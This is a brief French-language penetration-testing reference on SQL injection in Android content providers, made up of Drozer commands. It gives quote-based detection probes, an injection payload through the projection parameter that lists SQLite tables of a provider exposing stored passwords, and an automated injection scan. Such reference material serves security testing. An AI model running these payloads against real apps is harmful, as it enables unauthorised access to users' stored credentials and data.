# Injections SQL (Android)

## Manuelle dans content provider

### Détection

```
dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --selection "'"

et

dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --projection "'"
```

### Exploitation

<pre><code><strong>dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
</strong></code></pre>

### Automatique

```
dz> run scanner.provider.injection -a com.example.targetapp
```